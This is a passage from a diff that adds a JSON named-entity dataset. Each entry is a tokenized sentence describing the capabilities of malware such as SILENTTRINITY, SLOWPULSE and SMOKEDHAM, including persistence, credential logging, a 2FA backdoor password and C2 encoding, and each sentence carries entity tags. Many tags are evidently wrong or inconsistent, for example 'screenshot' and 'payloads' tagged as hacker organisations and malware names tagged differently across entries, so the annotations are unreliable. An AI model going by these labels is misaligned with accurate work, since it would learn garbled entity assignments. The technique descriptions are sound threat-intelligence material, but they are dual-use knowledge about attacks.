+ ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "enumerate", + "shares", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "use", + "PowerShell", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "enumerate", + "processes,", + "including", + "properties", + "to", + "determine", + "if", + "they", + "have", + "the", + "Common", + "Language", + "Runtime", + "(CLR)", + "loaded." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "inject", + "shellcode", + "directly", + "into", + "Excel.exe", + "or", + "a", + "specific", + "process." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "is", + "written", + "in", + "Python", + "and", + "can", + "use", + "multiple", + "Python", + "scripts", + "for", + "execution", + "on", + "targeted", + "systems." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "use", + "the", + "`GetRegValue`", + "function", + "to", + "check", + "Registry", + "keys", + "within", + "`HKCU\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`", + "and", + "`HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer\\AlwaysInstallElevated`.", + "It", + "also", + "contains", + "additional", + "modules", + "that", + "can", + "check", + "software", + "AutoRun", + "values", + "and", + "use", + "the", + "Win32", + "namespace", + "to", + "get", + "values", + "from", + "HKCU,", + "HKLM,", + "HKCR,", + "and", + "HKCC", + "hives." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "establish", + "a", + "LNK", + "file", + "in", + "the", + "startup", + "folder", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "enumerate", + "and", + "collect", + "the", + "properties", + "of", + "domain", + "computers." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "take", + "a", + "screenshot", + "of", + "the", + "current", + "desktop." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "determine", + "if", + "an", + "anti-virus", + "product", + "is", + "installed", + "through", + "the", + "resolution", + "of", + "the", + "service's", + "virtual", + "SID." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "collect", + "information", + "related", + "to", + "a", + "compromised", + "host,", + "including", + "OS", + "version", + "and", + "a", + "list", + "of", + "drives." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "gather", + "a", + "list", + "of", + "logged", + "on", + "users." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "search", + "for", + "modifiable", + "services", + "that", + "could", + "be", + "used", + "for", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "collect", + "start", + "time", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "find", + "a", + "process", + "owned", + "by", + "a", + "specific", + "user", + "and", + "impersonate", + "the", + "associated", + "token." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "use", + "`cmd.exe`", + "to", + "enable", + "lateral", + "movement", + "using", + "DCOM." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "gather", + "Windows", + "Vault", + "credentials." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "B-Features" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "use", + "WMI", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "create", + "a", + "WMI", + "Event", + "to", + "execute", + "a", + "payload", + "for", + "persistence." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "tracks", + "`TrustedHosts`", + "and", + "can", + "move", + "laterally", + "to", + "these", + "targets", + "via", + "WinRM." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SILENTTRINITY", + "can", + "establish", + "persistence", + "by", + "creating", + "a", + "new", + "service." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLIGHTPULSE", + "contains", + "functionality", + "to", + "execute", + "arbitrary", + "commands", + "passed", + "to", + "it." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLIGHTPULSE", + "can", + "read", + "files", + "specified", + "on", + "the", + "local", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLIGHTPULSE", + "can", + "deobfuscate", + "base64", + "encoded", + "and", + "RC4", + "encrypted", + "C2", + "messages." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "RAPIDPULSE", + "can", + "transfer", + "files", + "to", + "and", + "from", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLIGHTPULSE", + "has", + "piped", + "the", + "output", + "from", + "executed", + "commands", + "to", + "`/tmp/1`." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLIGHTPULSE", + "can", + "base64", + "encode", + "all", + "incoming", + "and", + "outgoing", + "C2", + "messages." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLIGHTPULSE", + "can", + "RC4", + "encrypt", + "all", + "incoming", + "and", + "outgoing", + "C2", + "messages." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLIGHTPULSE", + "has", + "the", + "ability", + "to", + "process", + "HTTP", + "GET", + "requests", + "as", + "a", + "normal", + "web", + "server", + "and", + "to", + "insert", + "logic", + "that", + "will", + "read", + "or", + "write", + "files", + "or", + "execute", + "commands", + "in", + "response", + "to", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLIGHTPULSE", + "is", + "a", + "web", + "shell", + "that", + "can", + "read,", + "write,", + "and", + "execute", + "files", + "on", + "compromised", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "hashed", + "a", + "string", + "containing", + "system", + "information", + "prior", + "to", + "exfiltration", + "via", + "POST", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "uploaded", + "files", + "and", + "information", + "from", + "victim", + "machines." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "sent", + "system", + "information", + "to", + "a", + "C2", + "server", + "via", + "HTTP", + "and", + "HTTPS", + "POST", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "deleted", + "itself", + "and", + "the", + "'index.dat'", + "file", + "on", + "a", + "compromised", + "machine", + "to", + "remove", + "recent", + "Internet", + "history", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "can", + "enumerate", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "been", + "created", + "with", + "a", + "hidden", + "attribute", + "to", + "insure", + "it's", + "not", + "visible", + "to", + "the", + "victim." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "downloaded", + "files", + "onto", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "B-OffAct", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "a", + "keylogging", + "capability." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "named", + "a", + "service", + "it", + "establishes", + "on", + "victim", + "machines", + "as", + "\"TaskFrame\"", + "to", + "hide", + "its", + "malicious", + "purpose." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "mimicked", + "the", + "names", + "of", + "known", + "executables,", + "such", + "as", + "mediaplayer.exe." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "can", + "add,", + "modify,", + "and/or", + "delete", + "registry", + "keys.", + "It", + "has", + "changed", + "the", + "proxy", + "configuration", + "of", + "a", + "victim", + "system", + "by", + "modifying", + "the", + "<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet", + "Settings\\ZoneMap</code>", + "registry." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "enumerated", + "processes", + "by", + "ID,", + "name,", + "or", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "can", + "inject", + "into", + "running", + "processes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "taken", + "a", + "screenshot", + "of", + "a", + "victim's", + "desktop,", + "named", + "it", + "\"Filter3.jpg\",", + "and", + "stored", + "it", + "in", + "the", + "local", + "directory." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "the", + "capability", + "to", + "start", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "the", + "capability", + "to", + "stop", + "processes", + "and", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "collected", + "system", + "name,", + "OS", + "version,", + "adapter", + "information,", + "memory", + "usage,", + "and", + "disk", + "information", + "from", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "can", + "enumerate", + "open", + "ports", + "on", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "collected", + "the", + "username", + "from", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "the", + "capability", + "to", + "enumerate", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-Purp" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "used", + "HTTP", + "and", + "HTTPS", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "can", + "open", + "a", + "command", + "line", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOTHFULMEDIA", + "has", + "created", + "a", + "service", + "on", + "victim", + "machines", + "named", + "\"TaskFrame\"", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOWDRIFT", + "uses", + "cloud", + "based", + "services", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOWDRIFT", + "downloads", + "additional", + "payloads." + ], + "ner_tags": [ + "B-Way", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SLOWDRIFT", + "collects", + "and", + "sends", + "system", + "information", + "to", + "its", + "C2." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOWPULSE", + "is", + "applied", + "in", + "compromised", + "environments", + "through", + "modifications", + "to", + "legitimate", + "Pulse", + "Secure", + "files." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "SLOWPULSE", + "can", + "write", + "logged", + "ACE", + "credentials", + "to", + "`/home/perl/PAUS.pm`", + "in", + "append", + "mode,", + "using", + "the", + "format", + "string", + "`%s:%s\\n`." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "SLOWPULSE", + "can", + "insert", + "malicious", + "logic", + "to", + "bypass", + "RADIUS", + "and", + "ACE", + "two", + "factor", + "authentication", + "(2FA)", + "flows", + "if", + "a", + "designated", + "attacker-supplied", + "password", + "is", + "provided." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOWPULSE", + "can", + "log", + "credentials", + "on", + "compromised", + "Pulse", + "Secure", + "VPNs", + "during", + "the", + "`DSAuth::AceAuthServer::checkUsernamePassword`ACE-2FA", + "authentication", + "procedure." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "B-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOWPULSE", + "can", + "modify", + "LDAP", + "and", + "two", + "factor", + "authentication", + "flows", + "by", + "inspecting", + "login", + "credentials", + "and", + "forcing", + "successful", + "authentication", + "if", + "the", + "provided", + "password", + "matches", + "a", + "chosen", + "backdoor", + "password." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SLOWPULSE", + "can", + "hide", + "malicious", + "code", + "in", + "the", + "padding", + "regions", + "between", + "legitimate", + "functions", + "in", + "the", + "Pulse", + "Secure", + "`libdsplibs.so`", + "file." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "added", + "user", + "accounts", + "to", + "local", + "Admin", + "groups." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Org", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "used", + "a", + "fronted", + "domain", + "to", + "obfuscate", + "its", + "hard-coded", + "C2", + "server", + "domain." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "SMOKEDHAM", + "source", + "code", + "is", + "embedded", + "in", + "the", + "dropper", + "as", + "an", + "encrypted", + "string." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "exfiltrated", + "data", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "modified", + "the", + "Registry", + "to", + "hide", + "created", + "user", + "accounts", + "from", + "the", + "Windows", + "logon", + "screen." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "used", + "Powershell", + "to", + "download", + "UltraVNC", + "and", + "ngrok", + "from", + "third-party", + "file", + "sharing", + "sites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "can", + "continuously", + "capture", + "keystrokes." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "used", + "<code>net.exe", + "user</code>", + "and", + "<code>net.exe", + "users</code>", + "to", + "enumerate", + "local", + "accounts", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "created", + "user", + "accounts." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "B-Purp", + "B-Tool" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "relied", + "upon", + "users", + "clicking", + "on", + "a", + "malicious", + "link", + "delivered", + "through", + "phishing." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "modified", + "registry", + "keys", + "for", + "persistence,", + "to", + "enable", + "credential", + "caching", + "for", + "credential", + "access,", + "and", + "to", + "facilitate", + "lateral", + "movement", + "via", + "RDP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "can", + "execute", + "Powershell", + "commands", + "sent", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "used", + "<code>reg.exe</code>", + "to", + "create", + "a", + "Registry", + "Run", + "key." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "can", + "capture", + "screenshots", + "of", + "the", + "victim’s", + "desktop." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "been", + "delivered", + "via", + "malicious", + "links", + "in", + "phishing", + "emails." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "encoded", + "its", + "C2", + "traffic", + "with", + "Base64." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "encrypted", + "its", + "C2", + "traffic", + "with", + "RC4." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "used", + "the", + "<code>systeminfo</code>", + "command", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "used", + "<code>whoami</code>", + "commands", + "to", + "identify", + "system", + "owners." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "communicated", + "with", + "its", + "C2", + "servers", + "via", + "HTTPS", + "and", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SMOKEDHAM", + "has", + "used", + "Google", + "Drive", + "and", + "Dropbox", + "to", + "host", + "files", + "downloaded", + "by", + "victims", + "via", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SNUGRIDE", + "establishes", + "persistence", + "through", + "a", + "Registry", + "Run", + "key." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SNUGRIDE", + "encrypts", + "C2", + "traffic", + "using", + "AES", + "with", + "a", + "static", + "key." + ], + "ner_tags": [ + "B-Way", + "B-Features", + "B-HackOrg", + "B-Features", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SNUGRIDE", + "communicates", + "with", + "its", + "C2", + "server", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SNUGRIDE", + "is", + "capable", + "of", + "executing", + "commands", + "and", + "spawning", + "a", + "reverse", + "shell." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SOUNDBITE", + "is", + "capable", + "of", + "enumerating", + "application", + "windows." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SOUNDBITE", + "communicates", + "via", + "DNS", + "for", + "C2." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "SOUNDBITE", + "is", + "capable", + "of", + "enumerating", + "and", + "manipulating", + "files", + "and", + "directories." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SOUNDBITE", + "is", + "capable", + "of", + "modifying", + "the", + "Registry." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "B-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "SOUNDBITE", + "is", + "capable", + "of", + "gathering", + "system", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Data", + "SPACESHIP", + "copies", + "to", + "the", + "staging", + "area", + "is", + "compressed", + "with", + "zlib.", + "Bytes", + "are", + "rotated", + "by", + "four", + "positions", + "and", + "XOR'ed", + "with", + "0x23." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SPACESHIP", + "copies", + "staged", + "data", + "to", + "removable", + "drives", + "when", + "they", + "are", + "inserted", + "into", + "the", + "system." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SPACESHIP", + "identifies", + "files", + "and", + "directories", + "for", + "collection", + "by", + "searching", + "for", + "specific", + "file", + "extensions", + "or", + "file", + "modification", + "time." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SPACESHIP", + "identifies", + "files", + "with", + "certain", + "extensions", + "and", + "copies", + "them", + "to", + "a", + "directory", + "in", + "the", + "user's", + "profile." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SPACESHIP", + "achieves", + "persistence", + "by", + "creating", + "a", + "shortcut", + "in", + "the", + "current", + "user's", + "Startup", + "folder." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + 